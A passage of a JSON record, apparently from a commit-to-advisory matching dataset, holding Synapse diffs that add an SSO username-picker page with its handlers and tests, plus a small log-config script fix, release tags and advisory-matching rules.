"+ Raises:", + "+ RedirectException", + "+ \"\"\"", + "+ session_id = random_string(16)", + "+ now = self._clock.time_msec()", + "+ session = UsernameMappingSession(", + "+ auth_provider_id=auth_provider_id,", + "+ remote_user_id=remote_user_id,", + "+ display_name=attributes.display_name,", + "+ emails=attributes.emails,", + "+ client_redirect_url=client_redirect_url,", + "+ expiry_time_ms=now + self._MAPPING_SESSION_VALIDITY_PERIOD_MS,", + "+ extra_login_attributes=extra_login_attributes,", + "+ )", + "+", + "+ self._username_mapping_sessions[session_id] = session", + "+ logger.info(\"Recorded registration session id %s\", session_id)", + "+", + "+ # Set the cookie and redirect to the username picker", + "+ e = RedirectException(b\"/_synapse/client/pick_username\")", + "+ e.cookies.append(", + "+ b\"%s=%s; path=/\"", + "+ % (USERNAME_MAPPING_SESSION_COOKIE_NAME, session_id.encode(\"ascii\"))", + "+ )", + "+ raise e", + "+", + " async def _register_mapped_user(", + "@@ -271,5 +375,34 @@ class SsoHandler:", + " ) -> str:", + "+ \"\"\"Register a new SSO user.", + "+", + "+ This is called once we have successfully mapped the remote user id onto a local", + "+ user id, one way or another.", + "+", + "+ Args:", + "+ attributes: user attributes returned by the user mapping provider,", + "+ including a non-empty localpart.", + "+", + "+ auth_provider_id: A unique identifier for this SSO provider, e.g.", + "+ \"oidc\" or \"saml\".", + "+", + "+ remote_user_id: The unique identifier from the SSO provider.", + "+", + "+ user_agent: The user-agent in the HTTP request (used for potential", + "+ shadow-banning.)", + "+", + "+ ip_address: The IP address of the requester (used for potential", + "+ shadow-banning.)", + "+", + "+ Raises:", + "+ a MappingException if the localpart is invalid.", + "+", + "+ a SynapseError with code 400 and errcode Codes.USER_IN_USE if the localpart", + "+ is already taken.", + "+ \"\"\"", + "+", + " # Since the localpart is provided via a potentially untrusted module,", + " # ensure the MXID is valid before registering.", + "- if contains_invalid_mxid_characters(attributes.localpart):", + "+ if not attributes.localpart or contains_invalid_mxid_characters(", + "+ attributes.localpart", + "+ ):", + " raise MappingException(\"localpart is invalid: %s\" % (attributes.localpart,))", + "@@ -328 +461,106 @@ class SsoHandler:", + " )", + "+", + "+ async def check_username_availability(", + "+ self, localpart: str, session_id: str,", + "+ ) -> bool:", + "+ \"\"\"Handle an \"is username available\" callback check", + "+", + "+ Args:", + "+ localpart: desired localpart", + "+ session_id: the session id for the username picker", + "+ Returns:", + "+ True if the username is available", + "+ Raises:", + "+ SynapseError if the localpart is invalid or the session is unknown", + "+ \"\"\"", + "+", + "+ # make sure that there is a valid mapping session, to stop people dictionary-", + "+ # scanning for accounts", + "+", + "+ self._expire_old_sessions()", + "+ session = self._username_mapping_sessions.get(session_id)", + "+ if not session:", + "+ logger.info(\"Couldn't find session id %s\", session_id)", + "+ raise SynapseError(400, \"unknown session\")", + "+", + "+ logger.info(", + "+ \"[session %s] Checking for availability of username %s\",", + "+ session_id,", + "+ localpart,", + "+ )", + "+", + "+ if contains_invalid_mxid_characters(localpart):", + "+ raise SynapseError(400, \"localpart is invalid: %s\" % (localpart,))", + "+ user_id = UserID(localpart, self._server_name).to_string()", + "+ user_infos = await self._store.get_users_by_id_case_insensitive(user_id)", + "+", + "+ logger.info(\"[session %s] users: %s\", session_id, user_infos)", + "+ return not user_infos", + "+", + "+ async def handle_submit_username_request(", + "+ self, request: SynapseRequest, localpart: str, session_id: str", + "+ ) -> None:", + "+ \"\"\"Handle a request to the username-picker 'submit' endpoint", + "+", + "+ Will serve an HTTP response to the request.", + "+", + "+ Args:", + "+ request: HTTP request", + "+ localpart: localpart requested by the user", + "+ session_id: ID of the username mapping session, extracted from a cookie", + "+ \"\"\"", + "+ self._expire_old_sessions()", + "+ session = self._username_mapping_sessions.get(session_id)", + "+ if not session:", + "+ logger.info(\"Couldn't find session id %s\", session_id)", + "+ raise SynapseError(400, \"unknown session\")", + "+", + "+ logger.info(\"[session %s] Registering localpart %s\", session_id, localpart)", + "+", + "+ attributes = UserAttributes(", + "+ localpart=localpart,", + "+ display_name=session.display_name,", + "+ emails=session.emails,", + "+ )", + "+", + "+ # the following will raise a 400 error if the username has been taken in the", + "+ # meantime.", + "+ user_id = await self._register_mapped_user(", + "+ attributes,", + "+ session.auth_provider_id,", + "+ session.remote_user_id,", + "+ request.get_user_agent(\"\"),", + "+ request.getClientIP(),", + "+ )", + "+", + "+ logger.info(\"[session %s] Registered userid %s\", session_id, user_id)", + "+", + "+ # delete the mapping session and the cookie", + "+ del self._username_mapping_sessions[session_id]", + "+", + "+ # delete the cookie", + "+ request.addCookie(", + "+ USERNAME_MAPPING_SESSION_COOKIE_NAME,", + "+ b\"\",", + "+ expires=b\"Thu, 01 Jan 1970 00:00:00 GMT\",", + "+ path=b\"/\",", + "+ )", + "+", + "+ await self._auth_handler.complete_sso_login(", + "+ user_id,", + "+ request,", + "+ session.client_redirect_url,", + "+ session.extra_login_attributes,", + "+ )", + "+", + "+ def _expire_old_sessions(self):", + "+ to_expire = []", + "+ now = int(self._clock.time_msec())", + "+", + "+ for session_id, session in self._username_mapping_sessions.items():", + "+ if session.expiry_time_ms <= now:", + "+ to_expire.append(session_id)", + "+", + "+ for session_id in to_expire:", + "+ logger.info(\"Expiring mapping session %s\", session_id)", + "+ del self._username_mapping_sessions[session_id]", + "diff --git a/synapse/res/username_picker/index.html b/synapse/res/username_picker/index.html", + "new file mode 100644", + "index 000000000..37ea8bb6d", + "--- /dev/null", + "+++ b/synapse/res/username_picker/index.html", + "@@ -0,0 +1,19 @@", + "+", + "+", + "+ ", + "+ Synapse Login", + "+ ", + "+ ", + "+ ", + "+

    ", + "+
    ", + "+ ", + "+ ", + "+ ", + "+
    ", + "+ ", + "+ ", + "+ ", + "+
    ", + "+ ", + "+", + "diff --git a/synapse/res/username_picker/script.js b/synapse/res/username_picker/script.js", + "new file mode 100644", + "index 000000000..416a7c6f4", + "--- /dev/null", + "+++ b/synapse/res/username_picker/script.js", + "@@ -0,0 +1,95 @@", + "+let inputField = document.getElementById(\"field-username\");", + "+let inputForm = document.getElementById(\"form\");", + "+let submitButton = document.getElementById(\"button-submit\");", + "+let message = document.getElementById(\"message\");", + "+", + "+// Submit username and receive response", + "+function showMessage(messageText) {", + "+ // Unhide the message text", + "+ message.classList.remove(\"hidden\");", + "+", + "+ message.textContent = messageText;", + "+};", + "+", + "+function doSubmit() {", + "+ showMessage(\"Success. Please wait a moment for your browser to redirect.\");", + "+", + "+ // remove the event handler before re-submitting the form.", + "+ delete inputForm.onsubmit;", + "+ inputForm.submit();", + "+}", + "+", + "+function onResponse(response) {", + "+ // Display message", + "+ showMessage(response);", + "+", + "+ // Enable submit button and input field", + "+ submitButton.classList.remove('button--disabled');", + "+ submitButton.value = \"Submit\";", + "+};", + "+", + "+let allowedUsernameCharacters = RegExp(\"[^a-z0-9\\\\.\\\\_\\\\=\\\\-\\\\/]\");", + "+function usernameIsValid(username) {", + "+ return !allowedUsernameCharacters.test(username);", + "+}", + "+let allowedCharactersString = \"lowercase letters, digits, ., _, -, /, =\";", + "+", + "+function buildQueryString(params) {", + "+ return Object.keys(params)", + "+ .map(k => encodeURIComponent(k) + '=' + encodeURIComponent(params[k]))", + "+ .join('&');", + "+}", + "+", + "+function submitUsername(username) {", + "+ if(username.length == 0) {", + "+ onResponse(\"Please enter a username.\");", + "+ return;", + "+ }", + "+ if(!usernameIsValid(username)) {", + "+ onResponse(\"Invalid username. Only the following characters are allowed: \" + allowedCharactersString);", + "+ return;", + "+ }", + "+", + "+ // if this browser doesn't support fetch, skip the availability check.", + "+ if(!window.fetch) {", + "+ doSubmit();", + "+ return;", + "+ }", + "+", + "+ let check_uri = 'check?' + buildQueryString({\"username\": username});", + "+ fetch(check_uri, {", + "+ // include the cookie", + "+ \"credentials\": \"same-origin\",", + "+ }).then((response) => {", + "+ if(!response.ok) {", + "+ // for non-200 responses, raise the body of the response as an exception", + "+ return response.text().then((text) => { throw text; });", + "+ } else {", + "+ return response.json();", + "+ }", + "+ }).then((json) => {", + "+ if(json.error) {", + "+ throw json.error;", + "+ } else if(json.available) {", + "+ doSubmit();", + "+ } else {", + "+ onResponse(\"This username is not available, please choose another.\");", + "+ }", + "+ }).catch((err) => {", + "+ onResponse(\"Error checking username availability: \" + err);", + "+ });", + "+}", + "+", + "+function clickSubmit() {", + "+ event.preventDefault();", + "+ if(submitButton.classList.contains('button--disabled')) { return; }", + "+", + "+ // Disable submit button and input field", + "+ submitButton.classList.add('button--disabled');", + "+", + "+ // Submit username", + "+ submitButton.value = \"Checking...\";", + "+ submitUsername(inputField.value);", + "+};", + "+", + "+inputForm.onsubmit = clickSubmit;", + "diff --git a/synapse/res/username_picker/style.css b/synapse/res/username_picker/style.css", + "new file mode 100644", + "index 000000000..745bd4c68", + "--- /dev/null", + "+++ b/synapse/res/username_picker/style.css", + "@@ -0,0 +1,27 @@", + "+input[type=\"text\"] {", + "+ font-size: 100%;", + "+ background-color: #ededf0;", + "+ border: 1px solid #fff;", + "+ border-radius: .2em;", + "+ padding: .5em .9em;", + "+ display: block;", + "+ width: 26em;", + "+}", + "+", + "+.button--disabled {", + "+ border-color: #fff;", + "+ background-color: transparent;", + "+ color: #000;", + "+ text-transform: none;", + "+}", + "+", + "+.hidden {", + "+ display: none;", + "+}", + "+", + "+.tooltip {", + "+ background-color: #f9f9fa;", + "+ padding: 1em;", + "+ margin: 1em 0;", + "+}", + "+", + "diff --git a/synapse/rest/synapse/client/pick_username.py b/synapse/rest/synapse/client/pick_username.py", + "new file mode 100644", + "index 000000000..d3b6803e6", + "--- /dev/null", + "+++ b/synapse/rest/synapse/client/pick_username.py", + "@@ -0,0 +1,88 @@", + "+# -*- coding: utf-8 -*-", + "+# Copyright 2020 The Matrix.org Foundation C.I.C.", + "+#", + "+# Licensed under the Apache License, Version 2.0 (the \"License\");", + "+# you may not use this file except in compliance with the License.", + "+# You may obtain a copy of the License at", + "+#", + "+# http://www.apache.org/licenses/LICENSE-2.0", + "+#", + "+# Unless required by applicable law or agreed to in writing, software", + "+# distributed under the License is distributed on an \"AS IS\" BASIS,", + "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+# See the License for the specific language governing permissions and", + "+# limitations under the License.", + "+from typing import TYPE_CHECKING", + "+", + "+import pkg_resources", + "+", + "+from twisted.web.http import Request", + "+from twisted.web.resource import Resource", + "+from twisted.web.static import File", + "+", + "+from synapse.api.errors import SynapseError", + "+from synapse.handlers.sso import USERNAME_MAPPING_SESSION_COOKIE_NAME", + "+from synapse.http.server import DirectServeHtmlResource, DirectServeJsonResource", + "+from synapse.http.servlet import parse_string", + "+from synapse.http.site import SynapseRequest", + "+", + "+if TYPE_CHECKING:", + "+ from synapse.server import HomeServer", + "+", + "+", + "+def pick_username_resource(hs: \"HomeServer\") -> Resource:", + "+ \"\"\"Factory method to generate the username picker resource.", + "+", + "+ This resource gets mounted under /_synapse/client/pick_username. The top-level", + "+ resource is just a File resource which serves up the static files in the resources", + "+ \"res\" directory, but it has a couple of children:", + "+", + "+ * \"submit\", which does the mechanics of registering the new user, and redirects the", + "+ browser back to the client URL", + "+", + "+ * \"check\": checks if a userid is free.", + "+ \"\"\"", + "+", + "+ # XXX should we make this path customisable so that admins can restyle it?", + "+ base_path = pkg_resources.resource_filename(\"synapse\", \"res/username_picker\")", + "+", + "+ res = File(base_path)", + "+ res.putChild(b\"submit\", SubmitResource(hs))", + "+ res.putChild(b\"check\", AvailabilityCheckResource(hs))", + "+", + "+ return res", + "+", + "+", + "+class AvailabilityCheckResource(DirectServeJsonResource):", + "+ def __init__(self, hs: \"HomeServer\"):", + "+ super().__init__()", + "+ self._sso_handler = hs.get_sso_handler()", + "+", + "+ async def _async_render_GET(self, request: Request):", + "+ localpart = parse_string(request, \"username\", required=True)", + "+", + "+ session_id = request.getCookie(USERNAME_MAPPING_SESSION_COOKIE_NAME)", + "+ if not session_id:", + "+ raise SynapseError(code=400, msg=\"missing session_id\")", + "+", + "+ is_available = await self._sso_handler.check_username_availability(", + "+ localpart, session_id.decode(\"ascii\", errors=\"replace\")", + "+ )", + "+ return 200, {\"available\": is_available}", + "+", + "+", + "+class SubmitResource(DirectServeHtmlResource):", + "+ def __init__(self, hs: \"HomeServer\"):", + "+ super().__init__()", + "+ self._sso_handler = hs.get_sso_handler()", + "+", + "+ async def _async_render_POST(self, request: SynapseRequest):", + "+ localpart = parse_string(request, \"username\", required=True)", + "+", + "+ session_id = request.getCookie(USERNAME_MAPPING_SESSION_COOKIE_NAME)", + "+ if not session_id:", + "+ raise SynapseError(code=400, msg=\"missing session_id\")", + "+", + "+ await self._sso_handler.handle_submit_username_request(", + "+ request, localpart, session_id.decode(\"ascii\", errors=\"replace\")", + "+ )", + "diff --git a/synapse/types.py b/synapse/types.py", + "index 3ab6bdbe0..c7d4e9580 100644", + "--- a/synapse/types.py", + "+++ b/synapse/types.py", + "@@ -351,3 +351,5 @@ NON_MXID_CHARACTER_PATTERN = re.compile(", + "-def map_username_to_mxid_localpart(username, case_sensitive=False):", + "+def map_username_to_mxid_localpart(", + "+ username: Union[str, bytes], case_sensitive: bool = False", + "+) -> str:", + " \"\"\"Map a username onto a string suitable for a MXID", + "@@ -358,4 +360,4 @@ def map_username_to_mxid_localpart(username, case_sensitive=False):", + " Args:", + "- username (unicode|bytes): username to be mapped", + "- case_sensitive (bool): true if TEST and test should be mapped", + "+ username: username to be mapped", + "+ case_sensitive: true if TEST and test should be mapped", + " onto different mxids", + "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", + "index c54f1c579..368d600b3 100644", + "--- a/tests/handlers/test_oidc.py", + "+++ b/tests/handlers/test_oidc.py", + "@@ -15,3 +15,5 @@", + " import json", + "-from urllib.parse import parse_qs, urlparse", + "+import re", + "+from typing import Dict", + "+from urllib.parse import parse_qs, urlencode, urlparse", + "@@ -21,4 +23,9 @@ import pymacaroons", + "+from twisted.web.resource import Resource", + "+", + "+from synapse.api.errors import RedirectException", + " from synapse.handlers.oidc_handler import OidcError", + " from synapse.handlers.sso import MappingException", + "+from synapse.rest.client.v1 import login", + "+from synapse.rest.synapse.client.pick_username import pick_username_resource", + " from synapse.server import HomeServer", + "@@ -795,2 +802,136 @@ class OidcHandlerTestCase(HomeserverTestCase):", + "+ def test_empty_localpart(self):", + "+ \"\"\"Attempts to map onto an empty localpart should be rejected.\"\"\"", + "+ userinfo = {", + "+ \"sub\": \"tester\",", + "+ \"username\": \"\",", + "+ }", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: \")", + "+", + "+ @override_config(", + "+ {", + "+ \"oidc_config\": {", + "+ \"user_mapping_provider\": {", + "+ \"config\": {\"localpart_template\": \"{{ user.username }}\"}", + "+ }", + "+ }", + "+ }", + "+ )", + "+ def test_null_localpart(self):", + "+ \"\"\"Mapping onto a null localpart via an empty OIDC attribute should be rejected\"\"\"", + "+ userinfo = {", + "+ \"sub\": \"tester\",", + "+ \"username\": None,", + "+ }", + "+ self.get_success(_make_callback_with_userinfo(self.hs, userinfo))", + "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: \")", + "+", + "+", + "+class UsernamePickerTestCase(HomeserverTestCase):", + "+ servlets = [login.register_servlets]", + "+", + "+ def default_config(self):", + "+ config = super().default_config()", + "+ config[\"public_baseurl\"] = BASE_URL", + "+ oidc_config = {", + "+ \"enabled\": True,", + "+ \"client_id\": CLIENT_ID,", + "+ \"client_secret\": CLIENT_SECRET,", + "+ \"issuer\": ISSUER,", + "+ \"scopes\": SCOPES,", + "+ \"user_mapping_provider\": {", + "+ \"config\": {\"display_name_template\": \"{{ user.displayname }}\"}", + "+ },", + "+ }", + "+", + "+ # Update this config with what's in the default config so that", + "+ # override_config works as expected.", + "+ oidc_config.update(config.get(\"oidc_config\", {}))", + "+ config[\"oidc_config\"] = oidc_config", + "+", + "+ # whitelist this client URI so we redirect straight to it rather than", + "+ # serving a confirmation page", + "+ config[\"sso\"] = {\"client_whitelist\": [\"https://whitelisted.client\"]}", + "+ return config", + "+", + "+ def create_resource_dict(self) -> Dict[str, Resource]:", + "+ d = super().create_resource_dict()", + "+ d[\"/_synapse/client/pick_username\"] = pick_username_resource(self.hs)", + "+ return d", + "+", + "+ def test_username_picker(self):", + "+ \"\"\"Test the happy path of a username picker flow.\"\"\"", + "+ client_redirect_url = \"https://whitelisted.client\"", + "+", + "+ # first of all, mock up an OIDC callback to the OidcHandler, which should", + "+ # raise a RedirectException", + "+ userinfo = {\"sub\": \"tester\", \"displayname\": \"Jonny\"}", + "+ f = self.get_failure(", + "+ _make_callback_with_userinfo(", + "+ self.hs, userinfo, client_redirect_url=client_redirect_url", + "+ ),", + "+ RedirectException,", + "+ )", + "+", + "+ # check the Location and cookies returned by the RedirectException", + "+ self.assertEqual(f.value.location, b\"/_synapse/client/pick_username\")", + "+ cookieheader = f.value.cookies[0]", + "+ regex = re.compile(b\"^username_mapping_session=([a-zA-Z]+);\")", + "+ m = regex.search(cookieheader)", + "+ if not m:", + "+ self.fail(\"cookie header %s does not match %s\" % (cookieheader, regex))", + "+", + "+ # introspect the sso handler a bit to check that the username mapping session", + "+ # looks ok.", + "+ session_id = m.group(1).decode(\"ascii\")", + "+ username_mapping_sessions = self.hs.get_sso_handler()._username_mapping_sessions", + "+ self.assertIn(", + "+ session_id, username_mapping_sessions, \"session id not found in map\"", + "+ )", + "+ session = username_mapping_sessions[session_id]", + "+ self.assertEqual(session.remote_user_id, \"tester\")", + "+ self.assertEqual(session.display_name, \"Jonny\")", + "+ self.assertEqual(session.client_redirect_url, client_redirect_url)", + "+", + "+ # the expiry time should be about 15 minutes away", + "+ expected_expiry = self.clock.time_msec() + (15 * 60 * 1000)", + "+ self.assertApproximates(session.expiry_time_ms, expected_expiry, tolerance=1000)", + "+", + "+ # Now, submit a username to the username picker, which should serve a redirect", + "+ # back to the client", + "+ submit_path = f.value.location + b\"/submit\"", + "+ content = urlencode({b\"username\": b\"bobby\"}).encode(\"utf8\")", + "+ chan = self.make_request(", + "+ \"POST\",", + "+ path=submit_path,", + "+ content=content,", + "+ content_is_form=True,", + "+ custom_headers=[", + "+ (\"Cookie\", cookieheader),", + "+ # old versions of twisted don't do form-parsing without a valid", + "+ # content-length header.", + "+ (\"Content-Length\", str(len(content))),", + "+ ],", + "+ )", + "+ self.assertEqual(chan.code, 302, chan.result)", + "+ location_headers = chan.headers.getRawHeaders(\"Location\")", + "+ # ensure that the returned location starts with the requested redirect URL", + "+ self.assertEqual(", + "+ location_headers[0][: len(client_redirect_url)], client_redirect_url", + "+ )", + "+", + "+ # fish the login token out of the returned redirect uri", + "+ parts = urlparse(location_headers[0])", + "+ query = parse_qs(parts.query)", + "+ login_token = query[\"loginToken\"][0]", + "+", + "+ # finally, submit the matrix login token to the login API, which gives us our", + "+ # matrix access token, mxid, and device id.", + "+ chan = self.make_request(", + "+ \"POST\", \"/login\", content={\"type\": \"m.login.token\", \"token\": login_token},", + "+ )", + "+ self.assertEqual(chan.code, 200, chan.result)", + "+ self.assertEqual(chan.json_body[\"user_id\"], \"@bobby:test\")", + "+", + "diff --git a/tests/unittest.py b/tests/unittest.py", + "index 39e5e7b85..af7f752c5 100644", + "--- a/tests/unittest.py", + "+++ b/tests/unittest.py", + "@@ -22,3 +22,3 @@ import logging", + " import time", + "-from typing import Dict, Optional, Type, TypeVar, Union", + "+from typing import Dict, Iterable, Optional, Tuple, Type, TypeVar, Union", + "@@ -385,2 +385,5 @@ class HomeserverTestCase(TestCase):", + " await_result: bool = True,", + "+ custom_headers: Optional[", + "+ Iterable[Tuple[Union[bytes, str], Union[bytes, str]]]", + "+ ] = None,", + " ) -> FakeChannel:", + "@@ -407,2 +410,4 @@ class HomeserverTestCase(TestCase):", + "+ custom_headers: (name, value) pairs to add as request headers", + "+", + " Returns:", + "@@ -422,2 +427,3 @@ class HomeserverTestCase(TestCase):", + " await_result,", + "+ custom_headers,", + " )" + ], + "changed_files": [ + "changelog.d/8942.feature", + "docs/sample_config.yaml", + "synapse/app/homeserver.py", + "synapse/config/oidc_config.py", + "synapse/handlers/oidc_handler.py", + "synapse/handlers/sso.py", + "synapse/res/username_picker/index.html", + "synapse/res/username_picker/script.js", + "synapse/res/username_picker/style.css", + "synapse/rest/synapse/client/pick_username.py", + "synapse/types.py", + "tests/handlers/test_oidc.py", + "tests/unittest.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8942": "Use username picker from synapse core matrix-org/matrix-synapse-saml-mozilla#12 Potential bug when using SAML and workers might result in \"Unsolicited response\" errors #7530", + "8876": "Support multiple SSO identity providers during login/UIA flow #8927 Push login completion down into SsoHandler #8941 Implement a username picker for synapse #8942" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8942, 8942", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: redirect, resource", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: homeserver, server", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8942, 8876", + "relevance": 2 + } + ] + }, + { + "commit_id": "3ad699cc65dc55d4329a59a5f621ac4dadaa0fc5", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608130324, + "hunks": 2, + "message": "Fix generate_log_config script (#8952) It used to write an empty file if you gave it a -o arg.", + "diff": [ + "diff --git a/changelog.d/8952.misc b/changelog.d/8952.misc", + "new file mode 100644", + "index 000000000..4c4a87464", + "--- /dev/null", + "+++ b/changelog.d/8952.misc", + "@@ -0,0 +1 @@", + "+Fix bug in `generate_log_config` script which made it write empty files.", + "diff --git a/scripts/generate_log_config b/scripts/generate_log_config", + "index b6957f48a..a13a5634a 100755", + "--- a/scripts/generate_log_config", + "+++ b/scripts/generate_log_config", + "@@ -42,2 +42,4 @@ if __name__ == \"__main__\":", + " args = parser.parse_args()", + "- args.output_file.write(DEFAULT_LOG_CONFIG.substitute(log_file=args.log_file))", + "+ out = args.output_file", + "+ out.write(DEFAULT_LOG_CONFIG.substitute(log_file=args.log_file))", + "+ out.flush()" + ], + "changed_files": [ + "changelog.d/8952.misc", + "scripts/generate_log_config" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8952": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + 